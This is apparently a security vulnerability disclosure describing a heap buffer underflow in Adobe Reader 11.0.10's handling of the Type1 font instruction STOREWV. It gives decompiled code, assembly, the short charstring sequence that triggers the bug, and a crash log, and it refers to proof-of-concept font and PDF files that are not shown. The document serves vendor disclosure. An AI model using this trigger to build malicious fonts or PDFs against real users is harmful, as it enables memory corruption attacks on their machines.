In the Adobe Reader CoolType implementation of the `STOREWV` instruction (othersubr 19) used by Multiple Master Fonts [1], values are copied from a so-called "WeightVector" (an internal, MM-specific array) into the transient array (also known as "BuildCharArray"). The starting index is obtained from the operand stack, as shown below in Hex-Rays decompiled pseudo-code:
---
--op_sp;
idx = *(op_sp + 1);
[...]
master_designs = font->master_designs;
if ( master_designs + idx > font->lenBuildCharArray )
return -8;
---
or, in assembly:
---
.text:080426B7 movsx ebx, word ptr [esi+2]
[...]
.text:0804270F mov eax, [edi+2B8h]
.text:08042715 lea ecx, [ebx+eax]
.text:08042718 cmp ecx, [edi+360h]
.text:0804271E ja loc_8041FA1 ; jumptable 08041720 cases 0,2
---
The "master_designs" variable is the size of the "WeightVector" array and can be anything from 2 to 16, while "idx" is a fully controlled 16-bit signed integer. If "idx" is a negative number, the check can be effectively bypassed, thus leading to a buffer underflow of the "BuildCharArray" heap-based allocation, by a maximum of 64 bytes (16 dwords):
---
if ( master_designs )
{
buildchar_offset = idx;
weight_vector = font->weight_vector;
do
{
++it;
value = *weight_vector;
weight_vector += 4;
font->BuildCharArray[buildchar_offset] = value;
++buildchar_offset;
}
while ( it < font->master_designs );
op_sp = tmp_op_sp;
it = 0;
}
---
The vulnerability can be reproduced with Multiple Master Type1 fonts, but also with regular Type1 fonts, provided that a PostScript "/WeightVector" array is present in the font header (preferably of length 16), and the following instruction sequence is used for one of the rendered glyphs:
---
-16 1 19 callother
---
This will overwrite 64 bytes in front of the transient array, corrupting the heap headers and leading to Adobe Reader crash (full log can be found in "crash.txt"):
---
(270c.22b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7281a912 ebx=7281a480 ecx=00010000 edx=017c0000 esi=7281a912 edi=00000000
eip=72804a59 esp=0038ee74 ebp=0038ee88 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
BIB!BIBInitialize4+0x354b:
72804a59 895114 mov dword ptr [ecx+14h],edx ds:002b:00010014=????????
---
Adobe Reader 11.0.10 is confirmed to be affected, but we expect all prior versions of the software to be prone to the bug, too. A Type1 Proof of Concept font is attached ("poc.pfm" + "poc.pfb"), together with its source code to be compiled with the type1 tool ("poc.pfa"), and an actual PDF file with the offending font file embedded.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
References:
[1] http://en.wikipedia.org/wiki/Multiple_master_fonts
